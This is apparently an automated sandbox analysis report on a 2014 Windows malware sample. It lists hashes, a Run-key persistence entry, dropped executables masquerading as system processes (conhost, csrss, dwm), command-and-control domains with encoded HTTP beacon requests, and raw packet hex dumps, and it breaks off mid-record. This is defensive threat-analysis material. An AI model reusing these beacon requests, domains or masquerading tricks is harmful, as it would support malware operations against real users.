Analysis Date: 2014-08-28 18:47:30
MD5: 7a80a69986984d9946927c5fde6d3105
SHA1: e4f137d67bfcec59a2ae3d212311df3ae1b6d552

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: c75a7fa7d302ea9d649175c9d9d80a9e sha1: c1f5899f5e080091e291059279944d401579a4c9 size: 99328
Section .tls md5: c2c1dad0cacd6d7059154740e42428d3 sha1: d47482b2634d80df5728bc37e658b09b27b854ab size: 1536
Section .data md5: 36546804a32574919b76e8bb19706ca7 sha1: 8eeef43a832cf59e1cbc04341fa06a7c808c3199 size: 68096
Section .reloc md5: 9d2fcb9168dc29847c3c0ed44e488af6 sha1: a49e6757a0c611e7b30bfad47ae2166a0aa33662 size: 1024
Timestamp: 2005-10-13 06:36:57
PEhash: 3c6c7fb0a346a3c82ffbfe45a537e0cb03f593f0
IMPhash: a5ae549bb5c8dd2e2ab527d0825c1df4

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: 127.0.0.1
Winsock DNS: japanesegreenteaonline.com
Winsock DNS: happyratatuy.com
Winsock DNS: mysmallhomespace.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: japanesegreenteaonline.com
Type: A
173.247.248.36
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: happyratatuy.com
Type: A
DNS: mysmallhomespace.com
Type: A
HTTP GET: http://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v41=21&tq=gKZEtzyQTHhjcmXKOcU1p2B2F%2FSJEhTSFMDlacmL91WE%2ByaIAA5SlEQfHEjzpExetvL9H5mDxDu6g%2FdE3UNn7EKJIMs3CLjsNnURBtkAY3SNqTJHch17U9X6weUc3%2BTFP8Gnx%2BIIbapGE3GYVvcWW4d8nEErwlmwa1LJA17lg0csXz7%2FMGoBr9HWVEkrVIH2XbI%2FUalfRNSHJOQFnuBD5U7RinbkPvces2oPX1t8Vs0gDSuxQuQkqFhz21SeEhNwCOQDvN8GTbp%2BuF9LuQ9tlXjG52wienD0BrriGs6F1gaqwwkcpavlRUmSUye3DJmzRVf1DYO%2FiEvqzbMrpVPUYCVetwDldPd0bTUDOag%2BCPPIdOdAVIEDhpVyt5I1SAR%2FFu0UP6ZJ9IjLYQ%2BjX934UTRW
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJsX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 173.247.248.36:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   312e6769 663f7634 313d3231 2674713d   1.gif?v41=21&tq=
0x00000030 (00048)   674b5a45 747a7951 5448686a 636d584b   gKZEtzyQTHhjcmXK
0x00000040 (00064)   4f635531 70324232 46253246 534a4568   OcU1p2B2F%2FSJEh
0x00000050 (00080)   5453464d 446c6163 6d4c3931 57452532   TSFMDlacmL91WE%2
0x00000060 (00096)   42796149 41413553 6c455166 48456a7a   ByaIAA5SlEQfHEjz
0x00000070 (00112)   70457865 74764c39 48356d44 78447536   pExetvL9H5mDxDu6
0x00000080 (00128)   67253246 64453355 4e6e3745 4b4a494d   g%2FdE3UNn7EKJIM
0x00000090 (00144)   7333434c 6a734e6e 55524274 6b415933   s3CLjsNnURBtkAY3
0x000000a0 (00160)   534e7154 4a486368 31375539 58367765   SNqTJHch17U9X6we
0x000000b0 (00176)   55633325 32425446 5038476e 78253242   Uc3%2BTFP8Gnx%2B
0x000000c0 (00192)   49496261 70474533 47595676 63575734   IIbapGE3GYVvcWW4
0x000000d0 (00208)   64386e45 4572776c 6d776131 4c4a4131   d8nEErwlmwa1LJA1
0x000000e0 (00224)   376c6730 6373587a 37253246 4d476f42   7lg0csXz7%2FMGoB
0x000000f0 (00240)   72394857 56456b72 56494832 58624925   r9HWVEkrVIH2XbI%
0x00000100 (00256)   32465561 6c66524e 53484a4f 51466e75   2FUalfRNSHJOQFnu
0x00000110 (00272)   42443555 3752696e 626b5076 63657332   BD5U7RinbkPvces2
0x00000120 (00288)   6f505831 74385673 30674453 75785175   oPX1t8Vs0gDSuxQu
0x00000130 (00304)   516b7146 687a3231 53654568 4e77434f   QkqFhz21SeEhNwCO
0x00000140 (00320)   5144764e 38475462 70253242 7546394c   QDvN8GTbp%2BuF9L
0x00000150 (00336)   75513974 6c586a47 35327769 656e4430   uQ9tlXjG52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a74 6c586a47 35327769 656e4430   ...tlXjG52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a47 35327769 656e4430   ose....G52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a47 35327769 656e4430   .......G52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
